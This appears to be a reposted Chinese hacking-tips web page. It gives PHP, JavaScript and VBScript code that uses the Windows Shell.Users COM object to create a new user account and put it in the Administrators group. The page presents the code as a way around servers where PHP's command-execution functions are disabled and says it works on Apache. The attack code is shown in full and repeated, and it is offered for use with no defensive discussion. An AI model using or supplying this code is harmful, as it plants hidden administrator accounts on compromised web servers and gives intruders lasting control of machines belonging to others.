您现在的位置是:网站首页> 编程资料编程资料
php版shell.users加管理员帐号的方法_脚本攻防_网络安全_
2023-05-24
266人已围观
简介 php版shell.users加管理员帐号的方法_脚本攻防_网络安全_
当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
echo "
$username="IceSkin";
$password="skin.com";
$su = new COM("Shell.Users");
$h=$su->create($username);
$h->changePassword($password,"");
$h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组,
?>
对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 LCX 的代码
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
hi.baidu.com/南拳daddy
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
复制代码
代码如下:echo "
PHP 版Shell.Users加管理员帐号
"; $username="IceSkin";
$password="skin.com";
$su = new COM("Shell.Users");
$h=$su->create($username);
$h->changePassword($password,"");
$h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组,
?>
对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 LCX 的代码
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
hi.baidu.com/南拳daddy
相关内容
- 网站后台脚本漏洞挖掘技巧,基于工具快速挖掘_脚本攻防_网络安全_
- Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞_脚本攻防_网络安全_
- ewebeditor 上传遇到防火墙限制的解决办法 图文_脚本攻防_网络安全_
- 用JavaScript防止网站被挂IFRAME木马的方法_脚本攻防_网络安全_
- 防止网站被JS,iframe挂马的防范方法_脚本攻防_网络安全_
- 脚本入侵-上传漏洞总结篇(臭小子)_脚本攻防_网络安全_
- 脚本入侵 ASP网站入侵常用的一些技巧分享_脚本攻防_网络安全_
- 脚本入侵 入侵ewebeditor编辑器一些技巧_脚本攻防_网络安全_
- PHP 双字节、宽字节编码漏洞_脚本攻防_网络安全_
- PHP+MySQL手工注入语句大全 MySQL手工注入语句总结_脚本攻防_网络安全_
